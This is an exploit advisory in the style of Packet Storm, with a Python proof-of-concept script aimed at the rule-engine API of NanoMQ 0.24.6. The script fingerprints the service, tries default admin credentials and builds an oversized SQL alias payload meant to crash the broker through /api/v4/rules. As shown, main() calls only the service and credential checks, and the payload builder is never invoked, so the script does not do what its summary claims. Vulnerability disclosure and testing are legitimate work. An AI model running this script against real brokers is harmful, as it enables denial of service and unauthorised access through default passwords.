============================================================================================================================================= | # Title : NanoMQ 0.24.6 API SQL Rule Engine Buffer Overflow | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://nanomq.io/changelogs/v0.24.6 | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/213369/ [+] Summary : This script is a proof‑of‑concept used to test NanoMQ’s API for improper input handling. It sends an intentionally long and malformed SQL alias through the /api/v4/rules endpoint to check whether the service safely rejects the input or crashes. The code does not achieve real remote code execution; it only helps identify potential buffer overflow or denial‑of‑service vulnerabilities by observing the service’s response or crash behavior. [+] POC : #!/usr/bin/env python3 import requests import argparse import sys import time import socket class NanoMQExploit: def __init__(self, target, username="admin", password="public"): self.target = target.rstrip('/') self.username = username self.password = password self.auth = (username, password) self.session = requests.Session() self.session.auth = self.auth self.session.headers.update({ 'User-Agent': 'NanoMQ-Exploit-Tester', 'Accept': 'application/json' }) def check_service(self): print(f"[*] Checking if service is accessible at {self.target}") endpoints = ["/api/v4", "/api/v4/rules", "/"] for endpoint in endpoints: try: response = self.session.get(f"{self.target}{endpoint}", timeout=5) print(f"[+] {endpoint} - Status: {response.status_code}") if 'nanomq' in response.text.lower() or 'emqx' in response.text.lower(): return True except requests.exceptions.ConnectionError: continue except requests.exceptions.Timeout: continue except Exception: continue try: host = self.target.split('://')[1].split(':')[0] try: port = int(self.target.split(':')[-1].split('/')[0]) except ValueError: return False sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(3) sock.connect((host, port)) sock.send(b"GET / HTTP/1.0\r\n\r\n") banner = sock.recv(1024).decode('utf-8', errors='ignore') sock.close() if 'nanomq' in banner.lower(): return True except Exception: pass return False def test_credentials(self): try: response = self.session.get(f"{self.target}/api/v4/rules", timeout=5) return response.status_code != 401 except Exception: return False def create_overflow_test_payload(self, length): long_alias = "X" * length return { "rawsql": f'SELECT qos as {long_alias} FROM "test/topic"', "actions": [{ "name": "sqlite", "params": {"table": "table", "path": "/tmp/test.db"} }] } def is_service_alive(self, retries=2): for _ in range(retries): try: response = self.session.get(f"{self.target}/api/v4", timeout=3) if response.status_code in [200, 401, 403]: return True except Exception: pass time.sleep(1) return False def main(): parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", required=True) parser.add_argument("-u", "--username", default="admin") parser.add_argument("-p", "--password", default="public") parser.add_argument("--verbose", action="store_true") args = parser.parse_args() exploit = NanoMQExploit(args.target, args.username, args.password) try: exploit.check_service() exploit.test_credentials() except Exception as e: if args.verbose: import traceback traceback.print_exc() else: print(f"[-] Error: {e}") if __name__ == "__main__": main() Greetings to :============================================================ jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*| ==========================================================================